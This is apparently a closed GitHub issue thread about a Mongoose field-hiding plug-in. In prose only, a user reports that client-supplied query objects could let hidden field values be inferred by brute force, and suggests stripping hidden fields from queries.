Closed SirTangent closed 4 years ago
Can you elaborate a bit about the "passing of query objects".
Do you mean that the user could set a field as { hidePassword: false }
or what is the the scenario you are describing?
If so can you elaborate on the problem (by example) and your proposal (if you have one)?
Thanks for submitting the issue.
I'm not clearly seeing the purpose of this within the domain of this plug-in. It seems more a concern in your controllers.
With no further elaboration provided I'm closing the issue.
I found a potential security vulnerability if you allow clients to pass query objects. The library allows for queries of documents that meet conditions for hidden fields, which can expose values to the client through brute force.
The easiest fix im using is to deconstruct the hidden fields from the query object beforehand.
However, im wondering if it would be useful for the library to have deconstruction built-in for mongoose queries; therefore, adding more security. Not sure if there is another addon for it.